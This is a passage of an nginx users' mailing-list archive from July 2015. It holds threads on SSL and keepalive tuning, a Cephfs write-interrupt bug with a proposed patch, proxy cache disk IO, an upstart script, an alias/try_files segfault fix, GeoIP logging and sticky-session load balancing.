http://nginx.org/en/docs/http/configuring_https_servers.html Why does this happen ? I welcome any other advice to further optimise SSL Thanks listen 443 spdy default_server reuseport; ssl on; ssl_certificate /etc/ssl/filterbypass.me.crt; #(or .pem) ssl_certificate_key /etc/ssl/filterbypass.me.key.nopass; ssl_protocols TLSv1 TLSv1.1 TLSv1.2; #keepalive_timeout 70; #ssl_ciphers ECDHE-RSA-AES256-SHA384:AES256-SHA256:RC4:HIGH:!MD5:!aNULL:!eNULL:!NULL:!DH:!EDH:!AESGCM; ssl_ciphers ECDH+AESGCM:DH+AESGCM:ECDH+AES256:DH+AES256:ECDH+AES128:DH+AES:ECDH+3DES:DH+3DES:RSA+AESGCM:RSA+AES:RSA+3DES:!aNULL:!MD5:!DSS; ssl_prefer_server_ciphers on; ssl_buffer_size 8k; ssl_session_cache shared:SSL:20m; ssl_dhparam /etc/ssl/dhparam.pem; ssl_session_timeout 45m; ssl_stapling on; ssl_stapling_verify on; ssl_trusted_certificate /etc/ssl/trustchain.crt; resolver 8.8.8.8 8.8.4.4 valid=300s; resolver_timeout 5s; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains"; Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260541,260541#msg-260541 From vbart at nginx.com Fri Jul 24 13:41:17 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 24 Jul 2015 16:41:17 +0300 Subject: Nginx writing to Cephfs In-Reply-To: <56b3847718c3b907e63f2473dbc50455.NginxMailingListEnglish@forum.nginx.org> References: <4007463.aySMZuG2dP@vbart-workstation> <56b3847718c3b907e63f2473dbc50455.NginxMailingListEnglish@forum.nginx.org> Message-ID: <1603893.Br3xI9xU16@vbart-workstation> On Thursday 23 July 2015 14:51:58 vedranf wrote: > Valentin V. Bartenev Wrote: > > > It more looks like a bug in cephfs. writev() should never return > > ERESTARTSYS. > > > I've talked to the ceph people, they say ERESTARTSYS shows up in strace > output but it is handled by the kernel and that writev(2) is interrupted by > the SIGALRM, which actually appears in the strace output just after writev > fails. > > I also failed to get this error by doing the same this as nginx using dd, dd > always succeeded so it happens due to combination of nginx and cephfs. > > Here's full strace output (2 examples from 2 differently configured > servers): > > http://pastebin.com/wUAAcdT7 > > http://pastebin.com/wHyWc9U5 > Do you have timer_resolution configured? wbr, Valentin V. Bartenev From nginx-forum at nginx.us Fri Jul 24 13:55:04 2015 From: nginx-forum at nginx.us (vedranf) Date: Fri, 24 Jul 2015 09:55:04 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <1603893.Br3xI9xU16@vbart-workstation> References: <1603893.Br3xI9xU16@vbart-workstation> Message-ID: Valentin V. Bartenev Wrote: ------------------------------------------------------- > On Thursday 23 July 2015 14:51:58 vedranf wrote: > > Valentin V. Bartenev Wrote: > > > > > It more looks like a bug in cephfs. writev() should never return > > > ERESTARTSYS. > > > > > > I've talked to the ceph people, they say ERESTARTSYS shows up in > strace > > output but it is handled by the kernel and that writev(2) is > interrupted by > > the SIGALRM, which actually appears in the strace output just after > writev > > fails. > > > > I also failed to get this error by doing the same this as nginx > using dd, dd > > always succeeded so it happens due to combination of nginx and > cephfs. > > > > Here's full strace output (2 examples from 2 differently configured > > servers): > > > > http://pastebin.com/wUAAcdT7 > > > > http://pastebin.com/wHyWc9U5 > > > > Do you have timer_resolution configured? Yes, it's: timer_resolution 50ms; Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260543#msg-260543 From vbart at nginx.com Fri Jul 24 14:20:15 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 24 Jul 2015 17:20:15 +0300 Subject: Nginx writing to Cephfs In-Reply-To: References: <1603893.Br3xI9xU16@vbart-workstation> Message-ID: <8361838.MWInrWyZBq@vbart-workstation> On Friday 24 July 2015 09:55:04 vedranf wrote: > Valentin V. Bartenev Wrote: > ------------------------------------------------------- > > On Thursday 23 July 2015 14:51:58 vedranf wrote: > > > Valentin V. Bartenev Wrote: > > > > > > > It more looks like a bug in cephfs. writev() should never return > > > > ERESTARTSYS. > > > > > > > > > I've talked to the ceph people, they say ERESTARTSYS shows up in strace > > > output but it is handled by the kernel and that writev(2) is interrupted by > > > the SIGALRM, which actually appears in the strace output just after writev > > > fails. > > > > > > I also failed to get this error by doing the same this as nginx using dd, dd > > > always succeeded so it happens due to combination of nginx and cephfs. > > > > > > Here's full strace output (2 examples from 2 differently configured > > > servers): > > > > > > http://pastebin.com/wUAAcdT7 > > > > > > http://pastebin.com/wHyWc9U5 > > > > > > > Do you have timer_resolution configured? > > Yes, it's: > > timer_resolution 50ms; > This is the root cause of interrupts. Every 50ms it signals nginx and can interrupt any interruptible syscall (writing to file is usually not, but it seems different for Cephfs). You should avoid using timer_resolution, or try this patch: diff -r be8d8b1dad78 src/os/unix/ngx_files.c --- a/src/os/unix/ngx_files.c Fri Jul 24 17:18:20 2015 +0300 +++ b/src/os/unix/ngx_files.c Fri Jul 24 17:18:37 2015 +0300 @@ -264,6 +264,7 @@ ngx_write_chain_to_file(ngx_file_t *file u_char *prev; size_t size; ssize_t total, n; + ngx_err_t err; ngx_array_t vec; struct iovec *iov, iovs[NGX_IOVS]; @@ -335,10 +336,20 @@ ngx_write_chain_to_file(ngx_file_t *file file->sys_offset = offset; } +eintr: + n = writev(file->fd, vec.elts, vec.nelts); if (n == -1) { - ngx_log_error(NGX_LOG_CRIT, file->log, ngx_errno, + err = ngx_errno; + + if (err == NGX_EINTR) { + ngx_log_debug0(NGX_LOG_DEBUG_EVENT, c->log, err, + "writev() was interrupted"); + goto eintr; + } + + ngx_log_error(NGX_LOG_CRIT, file->log, err, "writev() \"%s\" failed", file->name.data); return NGX_ERROR; } From vbart at nginx.com Fri Jul 24 14:30:08 2015 From: vbart at nginx.com (Valentin V. Bartenev) Date: Fri, 24 Jul 2015 17:30:08 +0300 Subject: keepalive_timeout timeout causes high TTFB In-Reply-To: <0a1ca52bf9ba4f0ceb9e1eeb98cb2a76.NginxMailingListEnglish@forum.nginx.org> References: <0a1ca52bf9ba4f0ceb9e1eeb98cb2a76.NginxMailingListEnglish@forum.nginx.org> Message-ID: <5553992.ylcKOAR1Tb@vbart-workstation> On Friday 24 July 2015 09:40:40 khav wrote: > I am trying to further optimize SSL but if i enable keepalive_timeout i get > high TTFB as shown in the report below > > http://tools.pingdom.com/fpt/#!/KggzF > > When i disable keepalive_timeout , TTFB is fixed but nginx recommand > keepalive_timeout : > http://nginx.org/en/docs/http/configuring_https_servers.html > > Why does this happen ? [..] In the report above SPDY protocol was used, but the keepalive_timeout directive configures a timeout for https keepalive connections, and has no effect with SPDY. I believe it was just a coincidence, and big TTFB caused by something else. wbr, Valentin V. Bartenev From highclass99 at gmail.com Fri Jul 24 16:54:04 2015 From: highclass99 at gmail.com (highclass99) Date: Sat, 25 Jul 2015 01:54:04 +0900 Subject: Optimzing hard drive IO for proxy_pass Message-ID: I have server A with a large HDD at IDC 1 (TB hdd) I have server B with cheap bandwidth at IDC 2 (very small virtual server 20 GB hdd) I send all image requests to server B, and it caches from A. My problem is that on server IO is really high Server B iostat Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm %util sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05 8.78 4.64 0.25 47.71 dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 Here is my related nginx config --------------- cut -------------------------------------- proxy_cache_path /cache levels=1:2 keys_zone=MEDIA:200m inactive=2d max_size=6g; --------------- cut -------------------------------------- location / { proxy_pass http://SERVER_A proxy_cache MEDIA; proxy_cache_key "$scheme$request_uri"; proxy_cache_valid 200 302 304 7d; proxy_cache_valid 301 1h; proxy_cache_valid any 1m; proxy_cache_use_stale error timeout invalid_header http_500 http_502 http_503 http_504 http_404 updating; proxy_ignore_headers Cache-Control Expires Set-Cookie; proxy_cache_min_uses 3; proxy_cache_lock on; proxy_cache_lock_timeout 15s; expires 7d; } --------------- cut -------------------------------------- Server B has nothing else running. Server B is sending about 200~400 MBs traffic outside Is such a high IO load normal? Is there a way I can decrease the IO load while keeping the caching of server B efficient? Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 24 17:28:37 2015 From: nginx-forum at nginx.us (vedranf) Date: Fri, 24 Jul 2015 13:28:37 -0400 Subject: Nginx writing to Cephfs In-Reply-To: <8361838.MWInrWyZBq@vbart-workstation> References: <8361838.MWInrWyZBq@vbart-workstation> Message-ID: <52f0229069bcdf8d4b590158e80c9aa7.NginxMailingListEnglish@forum.nginx.org> Valentin V. Bartenev Wrote: ------------------------------------------------------- > On Friday 24 July 2015 09:55:04 vedranf wrote: > > Valentin V. Bartenev Wrote: > > ------------------------------------------------------- > > > On Thursday 23 July 2015 14:51:58 vedranf wrote: > > > > Valentin V. Bartenev Wrote: > > > > > > > > > It more looks like a bug in cephfs. writev() should never > return > > > > > ERESTARTSYS. > > > > > > > > > > > > I've talked to the ceph people, they say ERESTARTSYS shows up in > strace > > > > output but it is handled by the kernel and that writev(2) is > interrupted by > > > > the SIGALRM, which actually appears in the strace output just > after writev > > > > fails. > > > > > > > > I also failed to get this error by doing the same this as nginx > using dd, dd > > > > always succeeded so it happens due to combination of nginx and > cephfs. > > > > > > > > Here's full strace output (2 examples from 2 differently > configured > > > > servers): > > > > > > > > http://pastebin.com/wUAAcdT7 > > > > > > > > http://pastebin.com/wHyWc9U5 > > > > > > > > > > Do you have timer_resolution configured? > > > > Yes, it's: > > > > timer_resolution 50ms; > > > > This is the root cause of interrupts. Every 50ms it signals nginx > and can interrupt any interruptible syscall (writing to file is > usually not, but it seems different for Cephfs). > > You should avoid using timer_resolution, or try this patch: Thank you, removing timer_resolution fixed the problem. I'll look into the patch in the next few days. Regards, Vedran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260512,260550#msg-260550 From francis at daoine.org Fri Jul 24 22:44:55 2015 From: francis at daoine.org (Francis Daly) Date: Fri, 24 Jul 2015 23:44:55 +0100 Subject: proxy_pass redirection In-Reply-To: References: Message-ID: <20150724224455.GW23844@daoine.org> On Fri, Jul 24, 2015 at 11:16:12AM +0200, Puneeth Kumar wrote: Hi there, > Sorry for confusion, proxy_pass is working for me. > > I'm passing below link (exact URI) to proxy_pass > > http://IP:8881/ingestion/v1.0/streams/NGINEX. > > I want to keep the link(URI) only till > http://IP:8881/ingestion/v1.0/streams/ > & the last word (NGINX) application should pick. I do not understand what you want. Can you write down one request that you will make to nginx, and the matching request that you want nginx to make to its upstream? And then, write down one other request that you will make to nginx, and the matching request that you want nginx to make to its upstream. That may make it clear what proxy_pass directive you want. f -- Francis Daly francis at daoine.org From francis at daoine.org Fri Jul 24 22:53:38 2015 From: francis at daoine.org (Francis Daly) Date: Fri, 24 Jul 2015 23:53:38 +0100 Subject: Fetching a string by parsing URL In-Reply-To: <47162e390120903faa9cbe3acbc9f890.NginxMailingListEnglish@forum.nginx.org> References: <47162e390120903faa9cbe3acbc9f890.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150724225338.GX23844@daoine.org> On Thu, Jul 23, 2015 at 03:32:26PM -0400, sudharshanr wrote: Hi there? > For some reason, I'm getting it as null. This is my config file: What, specifically, are you getting as null? What response do you see that you do not want to see? If you make a request for /path1/one?name=two, what response do you want? Is it http 503 with the content of the file /Desktop/error5x.html, or something else? Where does "one" and "two" come into the response that you want to get? > However, if I update the location directive as below: > > location ~*/error5x.html? { > alias /Desktop/error5x.html?name=$arg_name&path=$last_path; > } > > I get a file not found error. Yes; that is what you have told nginx to do. (Unless you have a file with a name like /Desktop/error5x.html?name=two&path=one, which you probably do not.) If you can describe what you want to have happen, perhaps someone can tell you how to tell nginx to get that to happen. f -- Francis Daly francis at daoine.org From vikrant.thakur at gmail.com Fri Jul 24 23:09:02 2015 From: vikrant.thakur at gmail.com (vikrant singh) Date: Fri, 24 Jul 2015 16:09:02 -0700 Subject: upstart conf for managing nginx Message-ID: Hello, I wrote a small upstart script to stop/start nginx through upstart. This is how it looks description "nginx http daemon" start on (filesystem and net-device-up IFACE=lo) stop on runlevel [!2345] expect deamon respawn respawn limit 10 5 chdir /usr/local/nginx exec ./nginx I am running nginx from "/usr/local/nginx", and running as a user with super user. Still it hangs on start/stop command. Any idea what I may be missing.. Thanks, Vikrant -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Sat Jul 25 07:00:23 2015 From: francis at daoine.org (Francis Daly) Date: Sat, 25 Jul 2015 08:00:23 +0100 Subject: upstart conf for managing nginx In-Reply-To: References: Message-ID: <20150725070023.GY23844@daoine.org> On Fri, Jul 24, 2015 at 04:09:02PM -0700, vikrant singh wrote: Hi there, > I wrote a small upstart script to stop/start nginx through upstart. This is > how it looks I do not have an upstart system to test on, but: * comparing with http://wiki.nginx.org/Upstart, you have "expect daemon" and that has "expect fork". * the binary you run is /usr/local/nginx/nginx; I think it is more common for it to be /usr/local/nginx/sbin/nginx. Does checking and changing either of those make a difference? Does "hangs" mean "things run fine eventually, but there is a delay"; or "things never run correctly"? (Is there anything in the nginx or upstart logs which might indicate the problem?) f -- Francis Daly francis at daoine.org From nginx-forum at nginx.us Sun Jul 26 14:25:19 2015 From: nginx-forum at nginx.us (Per Hansson) Date: Sun, 26 Jul 2015 10:25:19 -0400 Subject: Alias regex use causing core dump as of nginx 1.7.1 Message-ID: Hi, after upgrading from the v1.6.3 to v1.8.0 stable branch an alias I used for Roundcubemail no longer works. I traced the issue back to a probable change made in nginx v1.7.1: "Bugfix: the "alias" directive used inside a location given by a regular expression worked incorrectly if the "if" or "limit_except" directives were used." In version 1.6.3 and 1.7.0 the following works fine: ## Roundcubemail for Remi repository location ~ ^/mail/(.+\.php)$ { alias /usr/share/roundcubemail/$1; client_max_body_size 5M; fastcgi_pass _php; } location ~ /mail { alias /usr/share/roundcubemail/; client_max_body_size 5M; try_files $uri $uri/ /index.php; } But in v1.7.1 it causes nginx to core dump if I visit the url domain.com/mail and if I visit domain.com/mail/ I get taken to the front page. [notice] 26221#0: signal 17 (SIGCHLD) received [alert] 26221#0: worker process 26223 exited on signal 11 (core dumped) [notice] 26221#0: start worker process 26231 [notice] 26221#0: signal 29 (SIGIO) received Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260558,260558#msg-260558 From highclass99 at gmail.com Sun Jul 26 15:29:51 2015 From: highclass99 at gmail.com (highclass99) Date: Mon, 27 Jul 2015 00:29:51 +0900 Subject: Optimzing hard drive IO for proxy_pass Message-ID: I have server A with a large HDD at IDC 1 (TB hdd) I have server B with cheap bandwidth at IDC 2 (very small virtual server 20 GB hdd) I send all image requests to server B, and it caches from A. My problem is that on server IO is really high Server B iostat Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz avgqu-sz await svctm %util sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 2.95 2.20 0.36 47.67 dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05 8.78 4.64 0.25 47.71 dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00 Here is my related nginx config --------------- cut -------------------------------------- proxy_cache_path /cache levels=1:2 keys_zone=MEDIA:200m inactive=2d max_size=6g; --------------- cut -------------------------------------- location / { proxy_pass http://SERVER_A proxy_cache MEDIA; proxy_cache_key "$scheme$request_uri"; proxy_cache_valid 200 302 304 7d; proxy_cache_valid 301 1h; proxy_cache_valid any 1m; proxy_cache_use_stale error timeout invalid_header http_500 http_502 http_503 http_504 http_404 updating; proxy_ignore_headers Cache-Control Expires Set-Cookie; proxy_cache_min_uses 3; proxy_cache_revalidate on; proxy_cache_lock on; proxy_cache_lock_timeout 15s; expires 7d; } --------------- cut -------------------------------------- Server B has nothing else running. Server B is sending about 200~400 MBs traffic outside Is such a high IO load normal? Is there a way I can decrease the IO load while keeping the caching of server B efficient? Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: From highclass99 at gmail.com Sun Jul 26 15:31:47 2015 From: highclass99 at gmail.com (highclass99) Date: Mon, 27 Jul 2015 00:31:47 +0900 Subject: Optimzing hard drive IO for proxy_pass In-Reply-To: References: Message-ID: Sorry everyone about the multiple posts with the same content... My own posts weren't coming to me at all through email... I just checked http://mailman.nginx.org/pipermail/nginx/2015-July/thread.html and found out all my posts were posted. Again I apologize for the inconvenience. :( It was sincerely a mistake. On Mon, Jul 27, 2015 at 12:29 AM, highclass99 wrote: > I have server A with a large HDD at IDC 1 (TB hdd) > I have server B with cheap bandwidth at IDC 2 (very small virtual server > 20 GB hdd) > > I send all image requests to server B, and it caches from A. > My problem is that on server IO is really high > > Server B iostat > Device: rrqm/s wrqm/s r/s w/s rsec/s wsec/s avgrq-sz > avgqu-sz await svctm %util > sda 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 > 2.95 2.20 0.36 47.67 > sda1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 > 0.00 0.00 0.00 0.00 > sda2 34.01 517.21 1263.36 76.72 19922.27 4751.42 18.41 > 2.95 2.20 0.36 47.67 > dm-0 0.00 0.00 1297.37 593.93 19922.27 4751.42 13.05 > 8.78 4.64 0.25 47.71 > dm-1 0.00 0.00 0.00 0.00 0.00 0.00 0.00 > 0.00 0.00 0.00 0.00 > > Here is my related nginx config > --------------- cut -------------------------------------- > proxy_cache_path /cache levels=1:2 > keys_zone=MEDIA:200m > inactive=2d max_size=6g; > --------------- cut -------------------------------------- > location / { > proxy_pass http://SERVER_A > proxy_cache MEDIA; > proxy_cache_key "$scheme$request_uri"; > > proxy_cache_valid 200 302 304 7d; > proxy_cache_valid 301 1h; > proxy_cache_valid any 1m; > proxy_cache_use_stale error timeout invalid_header http_500 > http_502 http_503 http_504 http_404 updating; > proxy_ignore_headers Cache-Control Expires > Set-Cookie; > proxy_cache_min_uses 3; > proxy_cache_revalidate on; > proxy_cache_lock on; > proxy_cache_lock_timeout 15s; > > expires 7d; > } > --------------- cut -------------------------------------- > > Server B has nothing else running. > Server B is sending about 200~400 MBs traffic outside > Is such a high IO load normal? > Is there a way I can decrease the IO load while keeping the caching of > server B efficient? > > Thank you. > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Jul 27 02:49:01 2015 From: nginx-forum at nginx.us (justink101) Date: Sun, 26 Jul 2015 22:49:01 -0400 Subject: Using dynamic access_log, automatically create parent directory Message-ID: We use a dynamic value for access logs: access_log /var/log/nginx/domains/$host/access.log main; However, if the $host directory does not exist in /var/log/nginx/domains nginx fails with an error creating the access log. Is there a way to have nginx create the $host directory automatically instead of failing? Seems like this should be default behavior? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260563,260563#msg-260563 From mdounin at mdounin.ru Mon Jul 27 05:47:12 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 27 Jul 2015 08:47:12 +0300 Subject: Alias regex use causing core dump as of nginx 1.7.1 In-Reply-To: References: Message-ID: <20150727054712.GI19190@mdounin.ru> Hello! On Sun, Jul 26, 2015 at 10:25:19AM -0400, Per Hansson wrote: > Hi, after upgrading from the v1.6.3 to v1.8.0 stable branch an alias I used > for Roundcubemail no longer works. > I traced the issue back to a probable change made in nginx v1.7.1: > "Bugfix: the "alias" directive used inside a location given by a regular > expression worked incorrectly if the "if" or "limit_except" directives were > used." > > In version 1.6.3 and 1.7.0 the following works fine: > ## Roundcubemail for Remi repository > location ~ ^/mail/(.+\.php)$ { > alias /usr/share/roundcubemail/$1; > client_max_body_size 5M; > fastcgi_pass _php; > } > location ~ /mail { > alias /usr/share/roundcubemail/; > client_max_body_size 5M; > try_files $uri $uri/ /index.php; > } > > But in v1.7.1 it causes nginx to core dump if I visit the url > domain.com/mail and if I visit domain.com/mail/ I get taken to the front > page. > > [notice] 26221#0: signal 17 (SIGCHLD) received > [alert] 26221#0: worker process 26223 exited on signal 11 (core dumped) > [notice] 26221#0: start worker process 26231 > [notice] 26221#0: signal 29 (SIGIO) received Thanks, it was broken by this commit: http://hg.nginx.org/nginx/rev/c985d90a8d1f The patch below will fix the segfault. Note though, that the result will probably won't work for you. Proper way to fix this would be to don't use regex location for /mail, but use a prefix one instead, i.e.: location /mail { alias /usr/share/roundcubemail/; try_files $uri $uri/ /index.php; } (Note: no "~".) The configuration with regex location previously worked by coincidence - in try_files nginx used to do string comparison with regular expression specified, and this happened to produce sensible result in your case. Patch: # HG changeset patch # User Maxim Dounin # Date 1437975869 -10800 # Mon Jul 27 08:44:29 2015 +0300 # Node ID cb8f6e9d9943e2c8bd332443c0018a40353288fe # Parent d34cda011a8ed968c5f2c4469ce43b7e7f0afda6 Fixed segfault with try_files introduced by c985d90a8d1f. If alias was used in a location given by a regular expression, nginx used to do wrong thing in try_files if a location name (i.e., regular expression) was an exact prefix of URI. The following configuration triggered a segmentation fault on a request to "/mail": location ~ /mail { alias /path/to/directory; try_files $uri =404; } Reported by Per Hansson. diff --git a/src/http/ngx_http_core_module.c b/src/http/ngx_http_core_module.c --- a/src/http/ngx_http_core_module.c +++ b/src/http/ngx_http_core_module.c @@ -1239,7 +1239,9 @@ ngx_http_core_try_files_phase(ngx_http_r *e.pos = '\0'; - if (alias && ngx_strncmp(name, clcf->name.data, alias) == 0) { + if (alias && alias != NGX_MAX_SIZE_T_VALUE + && ngx_strncmp(name, clcf->name.data, alias) == 0) + { ngx_memmove(name, name + alias, len - alias); path.len -= alias; } -- Maxim Dounin http://nginx.org/ From bhuvangu at gmail.com Mon Jul 27 07:10:04 2015 From: bhuvangu at gmail.com (Bhuvan Gupta) Date: Mon, 27 Jul 2015 12:40:04 +0530 Subject: Nginx response with persistence session and backend server failure Message-ID: Hello all, I was reading Nginx documentation on persistence session using cookie and below is from documentation A request that comes from a client not yet bound to a particular server is passed to the server selected by the configured balancing method. Further requests with this cookie will be passed to the designated server. *If the designated server cannot process a request*, *the new server is selected as if the client has not been bound yet*. The last line says that *If the designated server cannot process a request*. What does it mean to say "the server cannot process a request." Question 1: Does it mean the server was down ? or does it mean server responded with some error code ? or does it mean that it did not responded in a certain time interval ? or does it mean that max number of connection limit is reached on that server ? Question 2: Let say there were 3 backend-server and we are using session persistence using cookie. Now assume that 2 of the backed server goes down so niginx will route all request to 3rd server Now 2 other server came back online, will niginx use the other 2 server to route the request even if request have the persistence cookie for 3rd server. Thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Jul 27 09:10:22 2015 From: nginx-forum at nginx.us (Jugurtha) Date: Mon, 27 Jul 2015 05:10:22 -0400 Subject: GeoIP data in access_log Nginx Message-ID: <39a47f15872b9279066e74f9edb58435.NginxMailingListEnglish@forum.nginx.org> Hello World, I would like to know if is possible to put GeoIP data (country for exemple) in my log access (nginx) I enabled the GeoIP module in my nginx (configure) and i would like to use the "$geoip_country_name" and "$geoip_city" in my accesslog I tried to add the two variables in my log format (main) but without success log_format main '$host $remote_addr - $remote_user [$time_local] "$request" ' '$status $body_bytes_sent "$http_referer" ' '"$http_user_agent" "$http_x_forwarded_for" "$request_time" "$upstream_cache_status" "$geoip_country_name" "$geoip_city"'; Result : my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "-" "-" But i would like this one : my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" "0.001" "HIT" "FR" "Paris" Thanks for your help, Best regards, Jugurtha Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260566,260566#msg-260566 From nginx-forum at nginx.us Mon Jul 27 11:26:33 2015 From: nginx-forum at nginx.us (Per Hansson) Date: Mon, 27 Jul 2015 07:26:33 -0400 Subject: Alias regex use causing core dump as of nginx 1.7.1 In-Reply-To: <20150727054712.GI19190@mdounin.ru> References: <20150727054712.GI19190@mdounin.ru> Message-ID: <20211ab18d0f4a62ba791388d03e29aa.NginxMailingListEnglish@forum.nginx.org> Thanks Maxim, you are correct about not making the /mail location a regex, it solves the problem. As for the core dump I compiled v1.9.3 with your patch and can confirm it no longer crashes with the original config. But as you suspected the config anyway does not work without removing the regex for the /mail location... Thanks for the quick fix! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260558,260567#msg-260567 From krueger at lesspain.de Mon Jul 27 15:24:21 2015 From: krueger at lesspain.de (=?UTF-8?Q?Robert_Kr=C3=BCger?=) Date: Mon, 27 Jul 2015 17:24:21 +0200 Subject: Is SSL and Compression never secure in nginx? Message-ID: Hi, I am working in a project where a password-protected extranet application is behind an nginx proxy using ssl. Now I asked the admin to enable server-side http-compression because we tend to have rather lengthy json responses from our REST api and they compress very well and the performance gain would be significant. He decline doing that, explaining that because of the CRIME vulnerability, it is not a good idea to enable compression when using ssl with nginx. Is this really always the case? Are there scenarios where the vulnerability is not a problem? I am trying to understand this better to make an informed decision because not using compression (encryption is a must) would incur other costs (optimizations in the code) and I don't just want to waste that time and money unless I have to. Thanks in advance, Robert -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Jul 27 17:01:44 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 27 Jul 2015 20:01:44 +0300 Subject: GeoIP data in access_log Nginx In-Reply-To: <39a47f15872b9279066e74f9edb58435.NginxMailingListEnglish@forum.nginx.org> References: <39a47f15872b9279066e74f9edb58435.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150727170144.GJ19190@mdounin.ru> Hello! On Mon, Jul 27, 2015 at 05:10:22AM -0400, Jugurtha wrote: > Hello World, > > I would like to know if is possible to put GeoIP data (country for exemple) > in my log access (nginx) > I enabled the GeoIP module in my nginx (configure) and i would like to use > the "$geoip_country_name" and "$geoip_city" in my accesslog > I tried to add the two variables in my log format (main) but without > success > > log_format main > '$host $remote_addr - $remote_user [$time_local] "$request" ' > '$status $body_bytes_sent "$http_referer" ' > '"$http_user_agent" "$http_x_forwarded_for" "$request_time" > "$upstream_cache_status" "$geoip_country_name" "$geoip_city"'; This is expected to work fine. > Result : > > my.domain.fr xxx.xxx.xxx.xxx - - [22/Jul/2015:17:14:21 +0200] "GET > /test.html HTTP/1.0" 404 564 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) > AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36" > "0.001" "HIT" "-" "-" Most likely geo information is not available for some reason. First of all I would recommend to check if appropriate GeoIP databases are present on your system and loaded into nginx using the geoip_country (for $geoip_country_name) and geoip_city (for $geoip_city) configuration directives. -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Mon Jul 27 17:29:23 2015 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Mon, 27 Jul 2015 19:29:23 +0200 Subject: Nginx response with persistence session and backend server failure In-Reply-To: References: Message-ID: On Mon, Jul 27, 2015 at 9:10 AM, Bhuvan Gupta wrote: > Hello all, > > I was reading Nginx documentation > on > persistence session using cookie and below is from documentation > > ?? > A request that comes from a client not yet bound to a particular server is > passed to the server selected by the configured balancing method. Further > requests with this cookie will be passed to the designated server. *If > the designated server cannot process a request*, *the new server is > selected as if the client has not been bound yet*. > > The last line says that > > *If the designated server cannot process a request*. > > What does it mean to say "the server cannot process a request." > > Question 1: > Does it mean the server was down ? > or does it mean server responded with some error code ? > or does it mean that it did not responded in a certain time interval ? > or does it mean that max number of connection limit is reached on that > server ? > ?It seems pretty clear to me that it describes whatever reason a server could have of not being able to handle a request. Your points #1 and #3 cannot be differenciated from a client point of view. Your point #4 makes the connection being refused (or times out? then it joins the 2 first points).? In thoses cases, the load balancer will try to find some machine accepting the request. Your point #2 is edgy: what kind of error? If it is a processing error, the request has been, by definition, processed, thus there is no need to contact another server. ?I suspect 5xx codes might consider the upstream being unavailable, while 4xx means the request processing has occurred.? > Question 2: > Let say there were 3 backend-server and we are using session persistence > using cookie. > Now assume that 2 of the backed server goes down so niginx will route all > request to 3rd server > Now 2 other server came back online, will niginx use the other 2 server to > route the request even if request have the persistence cookie for 3rd > server. > ?It is explicitely said? '?A request that comes from a client not yet bound to a particular server [...]'. If the 3rd server has been selected because it responds correctly, the client will be bound to it, thus it won't change when the other 2 servers come back online. That represents the added value of having a server-side cookie. On a basic load-balancing setup (no way to 'tie' a client to a server), the load-balancing would have resumed connecting the client to the server it is supposed to connect to (either following the load-balancing key or simply selectin the 'next' upstream based on the configured method). --- *B. R.*? -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Mon Jul 27 17:34:14 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 27 Jul 2015 20:34:14 +0300 Subject: Is SSL and Compression never secure in nginx? In-Reply-To: References: Message-ID: <20150727173414.GL19190@mdounin.ru> Hello! On Mon, Jul 27, 2015 at 05:24:21PM +0200, Robert Kr?ger wrote: > Hi, > > I am working in a project where a password-protected extranet application > is behind an nginx proxy using ssl. > > Now I asked 